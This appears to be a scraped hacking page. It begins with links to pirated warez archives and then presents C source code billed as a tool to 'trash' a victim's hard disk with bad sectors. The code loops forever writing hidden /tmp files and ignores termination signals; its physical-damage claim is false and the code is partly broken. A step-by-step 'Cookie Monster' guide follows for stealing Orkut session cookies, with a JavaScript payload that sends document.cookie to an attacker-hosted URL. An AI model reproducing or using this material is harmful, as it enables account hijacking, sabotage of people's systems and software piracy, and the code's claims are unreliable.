http://rapidshare.com/files/58258070/warezgroup.neromortius.warezgroup.rg.part06.rar
http://rapidshare.com/files/58259223/warezgroup.neromortius.warezgroup.rg.part07.rar
http://rapidshare.com/files/58260523/warezgroup.neromortius.warezgroup.rg.part08.rar
http://rapidshare.com/files/58261714/warezgroup.neromortius.warezgroup.rg.part09.rar
http://rapidshare.com/files/58249499/warezgroup.neromortius.warezgroup.rg.part10.rar

make bad sector on hard disk A C source code

A C source code


/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/

#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!n");
return; /* go back to creating bad sectors. */
}

Making of Cookie Monster

Making of Cookie Monster
Lets start and Make the ultimate cookie exploit to hack Orkut………

1.Go to lenhost.info . make a free Hosting account .

2.It will mail u all the details as ftp / My Sql username and password

3. Download install.php from here

[content suppressed]

4. Upload this file on the server and run .

In this lenhost when u open file manager u will see a folder by the name u register open that folder there is another folder named as HT u have to upload install.php file in that folder.

5 . It will Open as : a Installer

6. Fill the Coloums :

Database : its something like username_name

For this go to mysql and make a db .

Password : Your Password

User : sent to u by mail

Table : Give any name in this column

Server : This is found in mysql

Admin Password : Provide a pass to access admin area

Once you are done select Submit .

7. Next page in the end show u some links get the 3rd link
as new Image().src=’http://xxxxx.lenhost.info/getmonster.php?cookie=’+encodeURIComponent(document.cookie);

xxxxxx is the name from which u have registered..

8. Area where u recieve cookies.This link will open admin area http://xxxxxx.lenhost.info/logmonster.php it asks for the pass login wid the pass u provided during installation.

...

http://tariqhack.page.tl/Home.htm